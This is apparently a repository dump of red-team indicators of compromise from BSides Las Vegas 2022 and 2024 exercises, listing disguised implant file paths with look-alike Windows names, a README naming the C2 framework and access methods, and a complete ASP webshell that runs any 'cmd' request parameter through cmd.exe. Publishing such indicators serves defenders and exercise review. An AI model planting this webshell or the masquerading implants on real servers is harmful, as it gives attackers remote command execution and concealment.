C:\Windows\ToastData\Windows.SystemToask.RasToastNotifier.lnk 23 | C:\Windows\en-US\ragedit.exe.bin 24 | C:\Windows\ADFS\zh-HANT\icacls.dll 25 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Speech\v4.0_4.0.0.0__31bf3856ad364e35\System.Speach.dll 26 | C:\Windows\Boot\EFI\sr-Latn-CS\boutmgfw.efi.mui 27 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.SDHost\v4.0_6.3.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDHoPt.dll 28 | C:\Windows\SysWOW64\fi-FI\nms.dll.mui 29 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.FederationServices.ServerManager\v4.0_6.3.0.0__31bf3856ad364e35\Microsoft.FederotionServices.ServerManager.dll 30 | C:\Windows\System32\BestPractices\v1.0\Models\Microsoft\Windows\DHCPServer\DHCPServen.ps1 31 | C:\Windows\SysWOW64\Speech\SpeechUX\qapi.cpl 32 | C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\v4.0_6.3.0.0__31bf3856ad364e35\svrmgrnc.dll 33 | C:\Program Files (x86)\Common Files\System\Ole DB\en-US\sqloxedb.rll.mui 34 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.IdentityServer.Web.Resources\v4.0_6.3.0.0_th_31bf3856ad364e35\networkinspection.dll 35 | C:\Program Files\Windows NT\Accessories\wardpad.dll 36 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.Resources\v4.0_6.3.0.0_en_31bf3856ad364e35\WUDFUsbccidDriver.dll 37 | C:\Windows\System32\it-IT\mleng.dll.mui 38 | C:\Windows\SysWOW64\InstallShield\setupdir\0003\prnepcl2.dll 39 | C:\Windows\System32\LogFiles\AIT\AitEvenkLog.etl.001 40 | C:\Program Files (x86)\Internet Explorer\SIGNUP\instald.ins 41 | -------------------------------------------------------------------------------- /BSidesLV-2022/files.txt: -------------------------------------------------------------------------------- 1 | C:\Windows\System32\dsc\DscCofeR.exe 2 | 
C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Numerics\v4.0_4.0.0.0__b03f5f7f11d50a3a\peverify.dll 3 | C:\Program Files (x86)\Common Files\System\Ole DB\KBDGR1.exe 4 | C:\Windows\ADFS\ro\bfadfcoe.exe 5 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.ServerManager.NPASRole.Plugin\v4.0_6.3.0.0__31bf3856ad364e35\prm0008.exe 6 | C:\Windows\System32\twexk.exe 7 | C:\Windows\System32\KBDINBE9.exe 8 | C:\Windows\System32\dbgeni.exe 9 | C:\Windows\System32\whhehper.dll 10 | C:\Windows\ADFS\sr-Latn-RS\msdaps.exe 11 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Tpm.Resources\v4.0_6.3.0.0_en_31bf3856ad364e35\microsoft.tpm.resousces.dll 12 | C:\Windows\System32\ql2300.dll 13 | C:\Windows\System32\appidsvs.exe 14 | C:\Windows\System32\NlsLexacons000c.dll 15 | C:\Windows\System32\oobe\diaqER.dll 16 | C:\Windows\SysWOW64\AdvancedInstallers\cmiadapfer.dll 17 | C:\Windows\ADFS\nl\WmiApRes.exe 18 | C:\Windows\System32\isjsiwmiv2.exe 19 | C:\Windows\System32\KBDINVUN.exe 20 | C:\Windows\System32\drvutore.exe 21 | C:\Windows\System32\recorer.dll 22 | C:\Windows\System32\RMActivate_isd.exe 23 | C:\Windows\SysWOW64\InstallShield\setupdir\0c0c\_setop.exe 24 | C:\Windows\ADFS\it\encapi.dll 25 | C:\Windows\ADFS\es\slui.exe 26 | C:\Windows\System32\combane.exe 27 | C:\Windows\System32\ieUnadt.dll 28 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SrpUxSnapIn.resources\v4.0_6.3.0.0_en_31bf3856ad364e35\ShpUxSnapIn.resouices.exe 29 | C:\Windows\System32\JBDHAW.exe 30 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\blbwizfx\v4.0_6.3.0.0__31bf3856ad364e35\blbnizfx.exe 31 | C:\Windows\System32\kbh101.exe 32 | C:\Windows\System32\sispdieg.dll 33 | C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipkes.exe 34 | C:\Windows\System32\tdcen.exe 35 | C:\Windows\System32\KBQQULG.exe 36 | C:\Windows\System32\vlousres.exe 37 | C:\Windows\System32\odsldp.exe 38 | C:\Windows\System32\pnprlein.exe 39 | C:\Windows\SysWOW64\wbem\xpizards.exe 40 | 
C:\Windows\System32\Sysprep\syxpret.dll 41 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\sysglobl\v4.0_4.0.0.0__b03f5f7f11d50a3a\consent.dll 42 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Policy.1.0.System.Management.Automation\v4.0_1.0.0.0__31bf3856ad364e35\Policy.1.9.System.Management.Aitomation.exe 43 | C:\Windows\System32\MrmIndexep.exe 44 | C:\Windows\System32\scnsp.dll 45 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.ServerManager.ServerComponentDeploymentWizard\v4.0_6.3.0.0__31bf3856ad364e35\cmipnpinstall.dll 46 | C:\Windows\SysWOW64\Com\comodmin.exe 47 | C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.CertificateServices.Setup.Interop\v4.0_6.0.0.0__31bf3856ad364e35\apisetschema.exe 48 | C:\Windows\System32\cscaqi.exe 49 | C:\Windows\System32\kdujb.exe 50 | C:\Windows\System32\RpbRtLemoxu.exe 51 | C:\Windows\System32\IME\IMEJP\APPLETS\IMVPCAC.exe 52 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.GroupPolicy.Reporting\v4.0_2.0.0.0__31bf3856ad364e35\Microsoft.GcoupPolicy.Reporting.exe 53 | C:\Windows\System32\ncobjepi.dll 54 | C:\Windows\SysWOW64\InstallShield\setupdir\000b\_segup.exe 55 | C:\Windows\System32\ciphep.dll 56 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\WindowsFormsIntegration\v4.0_4.0.0.0__31bf3856ad364e35\mdmusrg.exe 57 | C:\Windows\System32\Sysprep\unbil.exe 58 | C:\Windows\System32\bdpcoda.exe 59 | C:\Windows\System32\dpmodemx.dll 60 | C:\Windows\System32\uindstr.exe 61 | C:\Windows\System32\deviceiccess.exe 62 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Services\v4.0_4.0.0.0__b77a5c561934e089\scrawpdo.exe 63 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.ADRoles.UI.Common\v4.0_6.3.0.0__31bf3856ad364e35\Microsoft.ODRoles.UI.Common.dll 64 | C:\Windows\ADFS\mpsdrv.dll 65 | C:\Windows\System32\ktcw32.dll 66 | C:\Windows\SysWOW64\migwiz\unFcl.dll 67 | 
C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.DeploymentServices.ServerManager.Plugin.Resources\v4.0_6.3.0.0_en_31bf3856ad364e35\Microsoft.Windows.DeploymenxServices.ServerManager.Plugin.resouqces.exe 68 | C:\Windows\Microsoft.NET\assembly\GAC_64\Policy.1.2.Microsoft.Interop.Security.AzRoles\v4.0_6.3.9600.16384__31bf3856ad364e35\Policy.1.2.Microsoft.Enterop.Security.AzRolek.exe 69 | C:\Windows\ADFS\hu\licensingdiag.exe 70 | C:\Windows\ADFS\cs\imkrmig.exe 71 | C:\Windows\apppatch\AcRus.exe 72 | C:\Windows\System32\wmdp.exe 73 | C:\Windows\System32\umrop.exe 74 | C:\Windows\ADFS\hr\wpncore.dll 75 | C:\Windows\System32\WindowsPowerShell\v1.0\Modules\NFS\MSFT_NfsMappedIdentity\net8187bv64.exe 76 | C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Transactions.Bridge.Dtc\v4.0_4.0.0.0__b03f5f7f11d50a3a\vssadmin.dll 77 | C:\Windows\System32\thambcache.exe 78 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.IdentityServer.Web.Resources\v4.0_6.3.0.0_de_31bf3856ad364e35\Microsoft.IdentityServer.Web.Rekources.dll 79 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Reflection.Primitives\v4.0_4.0.0.0__b03f5f7f11d50a3a\Syctem.Reflection.Primitives.exe 80 | C:\Windows\Microsoft.NET\assembly\GAC_32\napcrypt\v4.0_6.3.0.0__31bf3856ad364e35\KBDSMSFI.exe 81 | C:\Windows\System32\wpdbesenum.dll 82 | C:\Windows\System32\scexc.exe 83 | C:\Windows\ADFS\pt\samcli.exe 84 | C:\Windows\ADFS\zh-HK\luainstall.dll 85 | C:\Windows\SysWOW64\wbem\aepdu.dll 86 | C:\Program Files (x86)\Common Files\System\wab31.exe 87 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.WindowsRuntime.UI.Xaml\v4.0_4.0.0.0__b77a5c561934e089\Systei.Runtime.WindowsRentime.UI.Xabl.exe 88 | C:\Windows\System32\mispake.dll 89 | C:\Windows\System32\lapisp.dll 90 | C:\Windows\System32\SSSbim.dll 91 | C:\Windows\System32\vsstruce.dll 92 | C:\Windows\ADFS\pt\logoff.dll 93 | C:\Windows\System32\snmptqap.dll 94 | C:\Windows\System32\MUI\0409\msiorees.exe 95 | C:\Windows\System32\drivers\errnev.exe 
96 | C:\Windows\System32\KBDTAJUK.dll 97 | C:\Windows\SysWOW64\InstallShield\_tetup.exe 98 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Serialization.Primitives\v4.0_4.0.0.0__b03f5f7f11d50a3a\autochk.exe 99 | C:\Windows\System32\gultiDigiMon.exe 100 | C:\Windows\ADFS\pl\dv_aspnetmmc.exe 101 | C:\Windows\System32\GBDFTHRK.exe 102 | C:\Windows\System32\riceed32.exe 103 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.VolumeActivation.Plugin\v4.0_6.3.0.0__31bf3856ad364e35\MUILanguageCleanup.exe 104 | C:\Windows\ADFS\lt\basebrd.dll 105 | C:\Windows\System32\dsquecy.dll 106 | C:\Windows\ADFS\pl\Windows.System.Profile.HardwareId.dll 107 | C:\Windows\System32\BWContextHondler.exe 108 | C:\Windows\System32\OomplianceExtensions.exe 109 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.Resources\v4.0_1.0.0.0_en_31bf3856ad364e35\Microsoft.Management.Infrastruhture.Resources.exe 110 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.Commands.UpdateDiagReport.Resources\v4.0_1.0.0.0_en_31bf3856ad364e35\bowser.dll 111 | C:\Windows\System32\winasb.dll 112 | C:\Windows\ADFS\pt-BR\mdmtkr.dll 113 | C:\Windows\Branding\ShellBrd\shellbgd.exe 114 | C:\Windows\System32\pocript.dll 115 | C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\WMIADAP.dll 116 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Activities.Resources\v4.0_3.0.0.0_en_31bf3856ad364e35\mdmaiwa5.dll 117 | C:\Windows\ADFS\pl\AuthHost.exe 118 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.DirectoryServices.Instrumentation\v4.0_6.3.0.0__31bf3856ad364e35\NlsData000f.exe 119 | C:\Windows\System32\nlaapo.dll 120 | C:\Windows\System32\NlsLexicuns0049.exe 121 | C:\Windows\Microsoft.NET\Framework\sbs_lscorrc.dll 122 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Dtc.PowerShell\v4.0_6.3.0.0__31bf3856ad364e35\Microsoft.Dbb.PowevShell.exe 123 | 
C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework.Luna\v4.0_4.0.0.0__31bf3856ad364e35\PresentationFiamework.Luna.exe 124 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Dtc.PowerShell\v4.0_6.3.0.0__31bf3856ad364e35\refs.dll 125 | C:\Windows\System32\eqessnap.dll 126 | C:\Windows\System32\WindowsCosecs.dll 127 | C:\Windows\apppatch\apppatch64\AcWikRT.exe 128 | C:\Windows\System32\colc.exe 129 | C:\Windows\System32\sdhcikst.dll 130 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Core.Activities\v4.0_3.0.0.0__31bf3856ad364e35\pipanel.exe 131 | C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\NavigationBar.exe 132 | C:\Windows\System32\wuaep.exe 133 | C:\Windows\System32\KUDLT1.exe 134 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Activities\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Actovities.exe 135 | C:\Windows\Microsoft.NET\assembly\GAC_32\napcrypt\v4.0_6.3.0.0__31bf3856ad364e35\prm0013.exe 136 | C:\Windows\ADFS\lv\vss_ps.exe 137 | C:\Windows\System32\dot3goui.exe 138 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Linq\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Lonq.exe 139 | C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.SecureBoot.Commands.Resources\v4.0_6.3.0.0_en_31bf3856ad364e35\DeviceSetupStatusProvider.exe 140 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.IdentityServer.Web.Resources\v4.0_6.3.0.0_fr_31bf3856ad364e35\rdpinit.exe 141 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Abstractions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Abstractioew.dll 142 | C:\Windows\SysWOW64\setup\csmigr.exe 143 | C:\Windows\System32\mciqtz38.exe 144 | C:\Windows\ADFS\en\smtpcons.dll 145 | C:\Windows\System32\oobe\wvms_vspp.dll 146 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.WindowsRuntime\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.WindowsRuntame.exe 147 | 
C:\Windows\Microsoft.NET\assembly\GAC_MSIL\WindowsFormsIntegration\v4.0_4.0.0.0__31bf3856ad364e35\usbvideo.exe 148 | C:\Windows\System32\inetmib2.dll 149 | C:\Windows\System32\firfiles.dll 150 | C:\Windows\System32\mmcshoxt.dll 151 | C:\Windows\SysWOW64\InstallShield\setupdir\001f\_setep.dll 152 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MUI\0409\mscoqsecr.exe 153 | C:\Windows\System32\KBDTAX.dll 154 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Diagnostics.Tools\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Liagnostics.Tools.dll 155 | C:\Windows\Panther\wetup.exe 156 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Serialization\v4.0_4.0.0.0__b77a5c561934e089\SndVolSSO.exe 157 | C:\Windows\Speech\Common\sapasvr.exe 158 | C:\Windows\System32\petmsg.dll 159 | C:\Windows\System32\rinkinfo.exe 160 | C:\Windows\System32\fxppm.dll 161 | C:\Windows\Branding\ShellBrd\KBDBGPH.exe 162 | C:\Windows\System32\browxli.dll 163 | C:\Windows\System32\InputMethod\KOR\KorILE.exe 164 | C:\Windows\System32\dot3qpclnt.dll 165 | C:\Windows\Branding\Basebrd\wdsutil.exe 166 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.ServerManager.Common.resources\v4.0_6.3.0.0_en_31bf3856ad364e35\Microsoft.Windows.ServerManager.Common.reseurces.exe 167 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Policy.1.0.Microsoft.PowerShell.Commands.Utility\v4.0_1.0.0.0__31bf3856ad364e35\Kswdmcap.dll 168 | C:\Windows\System32\secur31.exe 169 | C:\Windows\ADFS\es\VerifierExt.exe 170 | C:\Windows\ADFS\uk\VmdCoinstall.dll 171 | C:\Windows\ADFS\uk\mdm5674a.dll 172 | C:\Windows\System32\dmdskros.exe 173 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Orawing.exe 174 | C:\Windows\System32\WcsPlugInKervice.dll 175 | C:\Windows\System32\Speech\Common\tapi.dll 176 | C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Dism\Microsoft.Dism.PowerSheol.exe 177 | C:\Windows\System32\gbd101c.exe 178 | C:\Windows\System32\Cefrag.dll 179 | C:\Program 
Files (x86)\Internet Explorer\networkinspectuon.exe 180 | C:\Windows\Boot\Resources\mdmti.dll 181 | C:\Windows\System32\dmvlgs.dll 182 | C:\Windows\System32\RspCaProxy.exe 183 | C:\Windows\SysWOW64\InstallShield\setupdir\0c0c\xpssvcs.exe 184 | C:\Windows\System32\NAPCLIENTPROV.dll 185 | C:\Windows\System32\ScDeviceEnoC.exe 186 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.Commands.GetDiagInput\v4.0_6.3.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.Commands.GatDiagInput.dll 187 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.IdentityServer.Web.Resources\v4.0_6.3.0.0_es_31bf3856ad364e35\KBDSYR2.exe 188 | C:\Windows\System32\Speech\Common\appmgr.exe 189 | C:\Windows\System32\netutibs.dll 190 | C:\Windows\ADFS\cs\prnhpcl4.exe 191 | C:\Program Files (x86)\Windows NT\TableTextService\TagleTextServiceArray.dll 192 | C:\Windows\ADFS\sr-Latn-RS\kd1394.dll 193 | C:\Windows\SysWOW64\migwiz\unbcw.exe 194 | C:\Windows\System32\inatmib1.exe 195 | C:\Windows\System32\msdth.dll 196 | C:\Windows\System32\hdwiiz.exe 197 | C:\Windows\ADFS\zh-HANT\provthrd.exe 198 | C:\Windows\ADFS\tr\DpiScaling.exe 199 | C:\Windows\System32\UserGpoPolicy.dll 200 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Engine\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Buisd.Evgine.exe 201 | C:\Windows\ADFS\ja\wmidcom.exe 202 | C:\Windows\System32\mciwaqe.dll 203 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Input.Manipulations\v4.0_4.0.0.0__b77a5c561934e089\msmouse.dll 204 | C:\Windows\SysWOW64\Dism\VhdProvuder.exe 205 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.IdentityServer.Web.Resources\v4.0_6.3.0.0_uk_31bf3856ad364e35\rndiscmp.dll 206 | C:\Windows\Branding\ShellBrd\discan.exe 207 | C:\Windows\System32\dhcpjapi.exe 208 | -------------------------------------------------------------------------------- /BSidesLV-2022/webshell.asp: -------------------------------------------------------------------------------- 1 | <% 2 | Set oScriptNet 
= Server.CreateObject("WSCRIPT.NETWORK") 3 | Function getCommandOutput(theCommand) 4 | Dim objShell, objCmdExec 5 | Set objShell = CreateObject("WScript.Shell") 6 | Set objCmdExec = objshell.exec(thecommand) 7 | getCommandOutput = objCmdExec.StdOut.ReadAll 8 | end Function 9 | %> 10 | 11 | 12 |
16 | <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %> 17 |
19 | <%
' Request-handling half of the webshell IOC. getCommandOutput (defined
' earlier in this file, outside this block) runs the string it is given
' through WScript.Shell.Exec and returns the process's StdOut.
' Request("cmd") names no collection, so the value may arrive via the query
' string or a form body (classic ASP searches its collections in turn). It is
' concatenated into the command line with no validation, and the literal
' "cmd /c" has no trailing space, so the supplied text is glued directly to
' "/c". Whatever reaches this page therefore executes under the hosting
' process's identity -- presumably the IIS worker, given the README's
' "Misconfigured IIS" access method -- and that host spawning cmd.exe in
' process-creation telemetry is the practical detection signal for this file.
20 | szCMD = request("cmd")
21 | szOutput = getCommandOutput("cmd /c" & szCMD)
22 | Response.Write(szOutput)
23 | %>
25 | 26 | -------------------------------------------------------------------------------- /BSidesLV-2024/README.md: -------------------------------------------------------------------------------- 1 | # BSides Las Vegas 2024 2 | 3 | ## Overview 4 | 5 | C2: [ThunderStorm](https://github.com/iDigitalFlame/ThunderStorm) 6 | 7 | Tools/Tech Used 8 | 9 | - Userland Hooking 10 | - [UserAdd Service](https://github.com/iDigitalFlame/ThunderStorm/blob/main/jetstream/templates/user_add.go) 11 | - JetStream "user_add" generator 12 | - Multiple Flurry implants 13 | - Multiple Bolt implants 14 | - PowerShell inline beacons 15 | 16 | ### Access Methods 17 | 18 | - Misconfigured IIS 19 | - AD CS Exploitation 20 | - Weak/Unchanged Passwords 21 | - Tasks/Cron 22 | 23 | ## IOC List 24 | 25 | - [Implants](implants.md) 26 | - [Cache/Support](files.md) 27 | - [Webshell](webshell.asp) 28 | 29 | Support binaries (your favorite Duck service!) are in the [Support](Support) 30 | folder. You can build these with the [build.sh](Support/build.sh) script 31 | _(requires MinGW)_. 32 | -------------------------------------------------------------------------------- /BSidesLV-2024/RedTeamHotwash.pdf: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:3a698da32bb18819a958e70b1a94a97cef16019958d79f76cb272a83f7fdb5fe 3 | size 163157 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-0.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:d51c67bb8a61de71612caef0af83759b5299ba16547e618ff84ada2c28114a71 3 | size 100068 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-1.png: -------------------------------------------------------------------------------- 1 | version 
https://git-lfs.github.com/spec/v1 2 | oid sha256:049aa135ebac13a62809ec34bb52744675e166f1f3495033d70c592d48f90087 3 | size 107223 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-10.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:f1455b810b3a145d972226f5a7535e747af37702345d355437b89f956da5fc03 3 | size 152897 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-11.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:3673163349baea95c421476711c7536bd85bdf9dc957a7323243b21c7d679c47 3 | size 556928 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-12.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:3673163349baea95c421476711c7536bd85bdf9dc957a7323243b21c7d679c47 3 | size 556928 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-13.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:a48a19f901e35636a8cf2e94ca51f0ae1fed490cbc10c737d06945becf0481c2 3 | size 1928153 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-14.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:59152129a764b6a95789aa72e6899f337c1f6e6176fd82c81fd6045e2ec92df8 3 | size 41922 4 | -------------------------------------------------------------------------------- 
/BSidesLV-2024/Screenshots/screenshot-15.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:9a1a42032899784062d5c1000e9dcbb5cd67f1f969f753577b70a251513478b5 3 | size 37354 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-16.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:0cf3f0c6d46fe6324b1a89f1373a678c1680e4cd5d10b206f1f98c3864855682 3 | size 108743 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-17.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:f693537245b9c00279246245f2e25f38c3770642083d31ba606d61929468ba87 3 | size 82009 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-18.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:35c980a0987f23199442a478acd2dbd57c64d0a9792c492774bc6db372d72290 3 | size 79799 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-19.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:614939e562938c841428d9b94272224f5588f2deb0b6bf1985d6713894d600eb 3 | size 73823 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-2.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid 
sha256:4df659ebc6183e7cdb5fc3b0d1b3ec6a92b3790e6941425d4d8eb8ce02bc7549 3 | size 98450 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-20.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:33fb3dd94611622204a3045a7f9686ab61ef1836d5ee4a0a6d1ef7915d584c6a 3 | size 149016 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-21.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:cf7f38a6c7987fa995871e1f7ca0f846956704967f79957cfacaff30aad6c514 3 | size 64043 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-22.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:65a942a19e0273b3c906641051b2d2aee350b7f463ac97b4f5bb0f9e5c83ebb8 3 | size 74409 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-23.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:8e6bc57c53a1b6ad4a82ba26ef8404338ee9bae7889ea79cd5454a805b36812b 3 | size 100639 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-24.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:f78c258bdb36a80ff784acfcc16bdb0b46c86814f49e66565de5d45e75b40d6b 3 | size 120706 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-25.png: 
-------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:1b67de5c0cce654620b94c409c8d79848083fd89712dd282ae6f7919f2e47cad 3 | size 69060 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-26.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:9eae6166a8aa3473a396127d956983ae45fa042522ed59d18d9266d5d6d5b8eb 3 | size 72018 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-27.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:cedd56d27bb7c9d97f883e78d5d3f03718b6ef734cfb906223acf76d255e1536 3 | size 66815 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-28.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:0176bf3b3d666e4b4bbcea556ab5594f9128e86c45782c8913742268b8529e48 3 | size 93997 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-29.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:dc95dfdcd7f63eaf6298f79455772e3581df13e8134e8710e05c460b797a2938 3 | size 3924 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-3.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:8f3841c589aa78918147764a7f47dd3630280a2886f6e0036fa52fed97a89b7b 3 | size 152409 4 | 
-------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-30.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:85eebc246b64c33f8838ca62dcad7e069bad70f9ef4e035a951e8d17f35861f0 3 | size 156738 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-31.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:cfe36bd0037b13b3590c64274f3e0de8b5a894829b1e2f82f40f451fd5e03597 3 | size 158465 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-32.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:37ab3080406c13af9ea9e6fb9026ea63cfab4b7cd728c347a3def58e5d6f5548 3 | size 180787 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-33.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:12132fd8a28780e4d184303d2fd09959822c4ef60b3d3b24a25ac9ac7a52d0c4 3 | size 61328 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-34.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:08db70105a100dd3a963b6deb2e74d8b7ae8ed16a998622f5c23c027ecf288f0 3 | size 32621 4 | -------------------------------------------------------------------------------- 